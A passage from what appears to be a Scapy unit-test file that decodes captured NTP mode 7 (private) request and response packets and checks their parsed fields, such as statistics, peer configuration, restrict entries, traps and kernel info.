b'\x17\x00\x03\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 5) + + += NTP Private (mode 7) - REQ_SYS_STATS (2) - response +s = b'\x97\x00\x03\x05\x00\x01\x00,\x00\x02\xe2;\x00\x02\xe2;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x0b=\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 5) +assert(isinstance(p.data[0], NTPInfoSysStats)) +assert(p.data[0].timeup == 188987) +assert(p.data[0].received == 2877) + + += NTP Private (mode 7) - REQ_IO_STATS (1) - request +s = b'\x17\x00\x03\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 6) + + += NTP Private (mode 7) - REQ_IO_STATS (2) - response +s = b'\x97\x00\x03\x06\x00\x01\x00(\x00\x00\x03\x04\x00\n\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\xd9\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00J' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 6) +assert(p.data[0].timereset == 772) +assert(p.data[0].sent == 217) + + += NTP Private (mode 7) - REQ_MEM_STATS (1) - request +s = b'\x17\x00\x03\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 7) + + += NTP Private (mode 7) - REQ_MEM_STATS (2) - response +s = b'\x97\x00\x03\x07\x00\x01\x00\x94\x00\x00\n\xee\x00\x0f\x00\r\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 7) +assert(p.data[0].timereset == 2798) +assert(p.data[0].totalpeermem == 15) +assert(p.data[0].freepeermem == 13) +assert(p.data[0].findpeer_calls == 60) +assert(p.data[0].hashcount[25] == 1 and p.data[0].hashcount[89] == 1) + + += NTP Private (mode 7) - REQ_LOOP_INFO (1) - request +s = b'\x17\x00\x03\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 8) + + += NTP Private (mode 7) - REQ_LOOP_INFO (2) - response +s = b'\x97\x00\x03\x08\x00\x01\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 8) +assert(p.data[0].last_offset == 0.0) +assert(p.data[0].watchdog_timer == 4) + + + += NTP Private (mode 7) - REQ_TIMER_STATS (1) - request +s = b'\x17\x00\x03\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 9) + + += NTP Private (mode 7) - REQ_TIMER_STATS (2) - response +s = b'\x97\x00\x03\t\x00\x01\x00\x10\x00\x00\x01h\x00\x00\x01h\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 9) +assert(p.data[0].timereset == 360) +assert(p.data[0].alarms == 360) + + += NTP Private (mode 7) - REQ_CONFIG (1) - request +s = b'\x17\x80\x03\n\x00\x01\x00\xa8\xc0\xa8zm\x01\x03\x06\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xec\x93\xb1\xa8\xa0a\x00\x00\x00\x01Z\xba\xfe\x01\x1cr\x05d\xa1\x14\xb1)\xe9vD\x8d' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 10) +assert(p.nb_items == 1) +assert(p.data_item_size == 168) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfPeer)) +assert(p.req_data[0].peeraddr == "192.168.122.109") +assert(p.req_data[0].hmode == 1) +assert(p.req_data[0].version == 3) +assert(p.req_data[0].minpoll == 6) +assert(p.req_data[0].maxpoll == 10) +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'5abafe011c720564a114b129e976448d') + + += NTP Private (mode 7) - REQ_CONFIG (2) - response +s = b'\x97\x00\x03\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 10) +assert(p.err == 0) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_UNCONFIG (1) - request +s = b'\x17\x80\x03\x0b\x00\x01\x00\x18\xc0\xa8zk\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0\x1bq\xc8\xe5\xa6\x00\x00\x00\x01\x1dM;\xfeZ~]Z\xe3Ea\x92\x9aE\xd8%' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 11) +assert(p.nb_items == 1) +assert(p.data_item_size == 24) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfUnpeer)) +assert(p.req_data[0].peeraddr == "192.168.122.107") +assert(p.req_data[0].v6_flag == 0) +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'1d4d3bfe5a7e5d5ae34561929a45d825') + + += NTP Private (mode 7) - REQ_UNCONFIG (2) - response +s = b'\x97\x00\x03\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 11) +assert(p.err == 0) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_RESADDFLAGS (1) - request +s = b'\x17\x80\x03\x11\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0V\xa9"\xe6_\x00\x00\x00\x01>=\xb70Tp\xee\xae\xe1\xad4b\xef\xe3\x80\xc8' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 17) +assert(p.nb_items == 1) +assert(p.data_item_size == 48) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfRestrict)) +assert(p.req_data[0].addr == "192.168.122.105") +assert(p.req_data[0].mask == "255.255.255.255") +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'3e3db7305470eeaee1ad3462efe380c8') + + += NTP Private (mode 7) - REQ_RESSUBFLAGS (1) - request +s = b'\x17\x80\x03\x12\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0F\xe0C\xa9@\x00\x00\x00\x01>e\r\xdf\xdb\x1e1h\xd0\xca)L\x07k\x90\n' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 18) +assert(p.nb_items == 1) +assert(p.data_item_size == 48) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfRestrict)) +assert(p.req_data[0].addr == "192.168.122.105") +assert(p.req_data[0].mask == "255.255.255.255") +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'3e650ddfdb1e3168d0ca294c076b900a') + + += NTP Private (mode 7) - REQ_RESET_PEER (1) - request +s = b"\x17\x80\x03\x16\x00\x01\x00\x18\xc0\xa8zf\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xef!\x99\x88\xa3\xf1\x00\x00\x00\x01\xb1\xff\xe8\xefB=\xa9\x96\xdc\xe3\x13'\xb3\xfc\xc2\xf5" +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 22) +assert(p.nb_items == 1) +assert(p.data_item_size == 24) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfUnpeer)) +assert(p.req_data[0].peeraddr == "192.168.122.102") +assert(p.req_data[0].v6_flag == 0) + + += NTP Private (mode 7) - REQ_AUTHINFO (1) - response +s = b'\x97\x00\x03\x1c\x00\x01\x00$\x00\x00\x01\xdd\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x01' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 28) +assert(p.err == 0) +assert(p.nb_items == 1) +assert(p.data_item_size == 36) +assert(hasattr(p, 'data')) +assert(isinstance(p.data[0], NTPInfoAuth)) +assert(p.data[0].timereset == 477) +assert(p.data[0].numkeys == 2) +assert(p.data[0].numfreekeys == 10) +assert(p.data[0].keylookups == 96) +assert(p.data[0].keynotfound == 0) +assert(p.data[0].encryptions == 9) +assert(p.data[0].decryptions == 47) +assert(p.data[0].expired == 0) +assert(p.data[0].keyuncached == 1) + + += NTP Private (mode 7) - REQ_ADD_TRAP (1) - request +s = b'\x17\x80\x03\x1e\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedB\xdd\xda\x7f\x97\x00\x00\x00\x01b$\xb8IM.\xa61\xd0\x85I\x8f\xa7\'\x89\x92' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 1) +assert(p.request_code == 30) +assert(p.err == 0) +assert(p.nb_items == 1) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfTrap)) +assert(p.req_data[0].trap_address == '192.0.2.3') +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'6224b8494d2ea631d085498fa7278992') + + += NTP Private (mode 7) - REQ_ADD_TRAP (2) - response +s = b'\x97\x00\x03\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 30) +assert(p.err == 0) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_CLR_TRAP (1) - request +s = b'\x17\x80\x03\x1f\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedb\xb3\x18\x1c\x00\x00\x00\x00\x01\xa5_V\x9e\xb8qD\x92\x1b\x1c>Z\xad]*\x89' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 1) +assert(p.request_code == 31) +assert(p.err == 0) +assert(p.nb_items == 1) +assert(hasattr(p, 'req_data')) +assert(isinstance(p.req_data[0], NTPConfTrap)) +assert(p.req_data[0].trap_address == '192.0.2.3') +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'a55f569eb87144921b1c3e5aad5d2a89') + + += NTP Private (mode 7) - REQ_CLR_TRAP (2) - response +s = b'\x97\x00\x03\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 31) +assert(p.err == 0) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_GET_CTLSTATS - response +s = b'\x97\x00\x03"\x00\x01\x00<\x00\x00\x00\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 34) +assert(p.nb_items == 1) +assert(p.data_item_size == 60) +assert(type(p.data[0]) == NTPInfoControl) +assert(p.data[0].ctltimereset == 237) + + += NTP Private (mode 7) - REQ_GET_KERNEL (1) - request +s = b'\x17\x00\x03&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 38) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_GET_KERNEL (2) - response +s = b'\x97\x00\x03&\x00\x01\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf4$\x00\x00\xf4$\x00 A\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 38) +assert(p.nb_items == 1) +assert(p.data_item_size == 60) +assert(isinstance(p.data[0], NTPInfoKernel)) +assert(p.data[0].maxerror == 16000000) +assert(p.data[0].esterror == 16000000) +assert(p.data[0].status == 8257) +assert(p.data[0].constant == 3) +assert(p.data[0].precision == 1) +assert(p.data[0].tolerance == 32768000) + + + += NTP Private (mode 7) - REQ_MON_GETLIST_1 